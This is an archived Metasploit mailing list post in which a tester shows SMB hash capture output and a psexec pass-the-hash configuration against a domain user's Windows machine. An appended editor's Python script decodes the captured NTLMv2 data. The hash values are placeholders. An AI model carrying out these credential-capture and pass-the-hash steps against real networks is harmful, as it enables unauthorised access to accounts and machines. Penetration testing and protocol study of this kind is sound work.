Metasploit mailing list archives
metasploit auxiliary/server/capture/smb and pass the hash
From: macubergeek <macubergeek () comcast net>
Date: Thu, 5 Apr 2012 04:54:09 -0400
I've been working with the metasploit auxiliary/server/capture/smb module and have had good success capturing smb hashes.

    [*] Empty hash captured from 192.168.1.1:1981 captured, ignoring ...
    [*] 2012-03-30 22:57:24 -0400 NTLMv2 Response Captured from 192.168.1.1:1981 USER:DomainUser DOMAIN:MASSIVE OS:Windows 2002 Service Pack 3 2600 LM:Windows 2002 5.1 LMHASH:AAAAAAAAAAAAAAAABBBBBBBBBBBBBBBB LM_CLIENT_CHALLENGE:cf4000a12bdec1ad NTHASH:CCCCCCCCCCCCCCCCDDDDDDDDDDDDDDDD NT_CLIENT_CHALLENGE:0101000000000000f89c09009812cd01cf4000a12bdec1ad00000000020000000000000000000000

Chris Gates's Carnal Ownage blog suggests cracking the A's with John and guessing at the B's.

My questions are: does the "Empty hash captured" signify that the LM hash was disabled on this box?

Passing the hash

I've tried passing the hash using exploit/windows/smb/psexec configured like so:

    Module options (exploit/windows/smb/psexec):

       Name       Current Setting                                                    Required  Description
       ----       ---------------                                                    --------  -----------
       RHOST      192.168.1.1                                                        yes       The target address
       RPORT      445                                                                yes       Set the SMB service port
       SHARE      ADMIN$                                                             yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
       SMBDomain  MASSIVE                                                            no        The Windows domain to use for authentication
       SMBPass    AAAAAAAAAAAAAAAABBBBBBBBBBBBBBBB:CCCCCCCCCCCCCCCCDDDDDDDDDDDDDDDD  no        The password for the specified username
       SMBUser    DomainUser                                                         no        The username to authenticate as

    Exploit target:

       Id  Name
       --  ----
       0   Automatic

This results in authentication/Login errors. I realize I can't pass the hash against DomainUser on his box while he's logged in, but does anyone know if I can, say, use a domain admin cred against DomainUser's box? I've tried doing psexec against DomainUser's box after he logged out of the machine and still no go. I'm not sure if pass the hash works here or if I'm using the correct answer for SMBPass.

Jim
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
%49%66%20%79%6F%75%20%63%61%6E%20%72%65%61%64%20%74%68%69%73%20%79%6F%75%20%6E%65%65%64%20%74%6F%20%67%65%74%20%61%20%67%69%72%6C%66%72%69%65%6E%64%2E
_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
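Added example (editor's code, not Metasploit's and not from the post): a parser for the two capture/smb lines quoted above that also decodes the NT_CLIENT_CHALLENGE value using the NTLMv2_CLIENT_CHALLENGE layout from MS-NLMP. It makes visible what the module's LMHASH and NTHASH labels hold in an NTLMv2 capture: 16-byte HMAC-MD5 responses bound to the server's challenge and a client challenge, not the stored LM/NT hashes that psexec's LM:NT form of SMBPass expects, which is the first thing to check before reading an authentication failure as a policy question. The blob's FILETIME and AV pairs (target info) are the same fields a responder pulls from an NTLMv2 exchange seen in a pcap. The sample lines are the post's, re-joined where the archive wrapped them; the AV-pair names are the MS-NLMP constants; everything else is assumed for the example.

```python
"""Decode what auxiliary/server/capture/smb actually logged.

Added example (not Metasploit code).  Sample lines are the two copied from
the post; the blob layout follows MS-NLMP 2.2.2.7 (NTLMv2_CLIENT_CHALLENGE).
"""
import re
import struct
from datetime import datetime, timedelta, timezone

# Constructed from the post above; the NT_CLIENT_CHALLENGE value is re-joined
# where the list archive wrapped it.
SAMPLE_LINES = [
    "[*] Empty hash captured from 192.168.1.1:1981 captured, ignoring ...",
    "[*] 2012-03-30 22:57:24 -0400 NTLMv2 Response Captured from 192.168.1.1:1981 "
    "USER:DomainUser DOMAIN:MASSIVE OS:Windows 2002 Service Pack 3 2600 LM:Windows 2002 5.1 "
    "LMHASH:AAAAAAAAAAAAAAAABBBBBBBBBBBBBBBB LM_CLIENT_CHALLENGE:cf4000a12bdec1ad "
    "NTHASH:CCCCCCCCCCCCCCCCDDDDDDDDDDDDDDDD "
    "NT_CLIENT_CHALLENGE:0101000000000000f89c09009812cd01cf4000a12bdec1ad"
    "00000000020000000000000000000000",
]

# Keys the module prints; longest first so LMHASH is never read as LM + "HASH".
KEYS = ("NT_CLIENT_CHALLENGE", "LM_CLIENT_CHALLENGE", "LMHASH", "NTHASH",
        "USER", "DOMAIN", "OS", "LM")
_ALT = "|".join(KEYS)
# A value runs until the next "KEY:" token or end of line (values may contain spaces).
FIELD_RE = re.compile(rf"(?P<key>{_ALT}):(?P<val>.*?)(?=\s+(?:{_ALT}):|$)")
HEADER_RE = re.compile(r"^\[\*\] (?P<ts>\S+ \S+ [+-]\d{4}) (?P<proto>NTLMv\d) Response "
                       r"Captured from (?P<src>\S+) (?P<rest>.*)$")
EMPTY_RE = re.compile(r"^\[\*\] Empty hash captured from (?P<src>\S+)")

FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
AV_NAMES = {0: "MsvAvEOL", 1: "MsvAvNbComputerName", 2: "MsvAvNbDomainName",
            3: "MsvAvDnsComputerName", 4: "MsvAvDnsDomainName", 5: "MsvAvDnsTreeName",
            6: "MsvAvFlags", 7: "MsvAvTimestamp", 8: "MsvAvSingleHost",
            9: "MsvAvTargetName", 10: "MsvAvChannelBindings"}
STRING_AVS = {1, 2, 3, 4, 5, 9}  # UTF-16LE string values in MS-NLMP


def filetime_to_datetime(ft):
    """Windows FILETIME (100 ns ticks since 1601-01-01 UTC) -> aware datetime."""
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def parse_ntlmv2_blob(hexblob):
    """Split an NTLMv2_CLIENT_CHALLENGE blob into its named fields."""
    raw = bytes.fromhex(hexblob)
    if len(raw) < 28:
        raise ValueError(f"blob too short for NTLMv2_CLIENT_CHALLENGE: {len(raw)} bytes")
    (resp_type, hi_resp_type, _res1, _res2,
     ts, client_chal, _res3) = struct.unpack_from("<BBHIQ8sI", raw, 0)
    if (resp_type, hi_resp_type) != (1, 1):
        raise ValueError(f"not an NTLMv2 blob: RespType={resp_type} HiRespType={hi_resp_type}")
    av_pairs, off = [], 28
    while off + 4 <= len(raw):  # AV_PAIR list: AvId, AvLen, value
        av_id, av_len = struct.unpack_from("<HH", raw, off)
        off += 4
        value = raw[off:off + av_len]
        off += av_len
        name = AV_NAMES.get(av_id, f"MsvAvUnknown({av_id})")
        av_pairs.append((name, value.decode("utf-16-le", "replace")
                         if av_id in STRING_AVS else value.hex()))
        if av_id == 0:  # MsvAvEOL terminates the list
            break
    return {"timestamp": filetime_to_datetime(ts), "client_challenge": client_chal.hex(),
            "av_pairs": av_pairs, "trailing_bytes": len(raw) - off}


def parse_capture_line(line):
    """Classify one capture/smb log line and structure its fields."""
    m = EMPTY_RE.match(line)
    if m:
        return {"kind": "empty", "src": m["src"]}
    m = HEADER_RE.match(line)
    if not m:
        return {"kind": "other", "line": line}
    fields = {f["key"]: f["val"] for f in FIELD_RE.finditer(m["rest"])}
    out = {"kind": "response", "proto": m["proto"], "logged_at": m["ts"],
           "src": m["src"], "fields": fields}
    if m["proto"] == "NTLMv2" and "NT_CLIENT_CHALLENGE" in fields:
        out["blob"] = parse_ntlmv2_blob(fields["NT_CLIENT_CHALLENGE"])
        # Each 16-byte HMAC-MD5 response is bound to its own 8-byte client challenge;
        # report whether the LMv2 one and the one inside the NTLMv2 blob agree.
        out["challenge_consistent"] = (fields.get("LM_CLIENT_CHALLENGE", "").lower()
                                       == out["blob"]["client_challenge"])
    return out


if __name__ == "__main__":
    for line in SAMPLE_LINES:
        rec = parse_capture_line(line)
        print(rec["kind"], rec.get("src"))
        if rec["kind"] == "response":
            blob = rec["blob"]
            print("  LMv2 response:", len(rec["fields"]["LMHASH"]) // 2, "bytes;",
                  "NTLMv2 response:", len(rec["fields"]["NTHASH"]) // 2,
                  "bytes (HMAC-MD5 values, not stored password hashes)")
            print("  client clock:", blob["timestamp"].isoformat())
            print("  target info:", blob["av_pairs"], "trailing bytes:", blob["trailing_bytes"])
```

Run it as a script to see the breakdown of the post's own lines; the empty line is reported separately because the module logs it before any response fields exist, so there is nothing to decode from it.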
Current thread:
- metasploit auxiliary/server/capture/smb and pass the hash macubergeek (Apr 05)
- Fwd: metasploit auxiliary/server/capture/smb and pass the hash Joshua Smith (Apr 05)
- Re: Fwd: metasploit auxiliary/server/capture/smb and pass the hash Kurt Grutzmacher (Apr 06)
- Fwd: metasploit auxiliary/server/capture/smb and pass the hash Joshua Smith (Apr 05)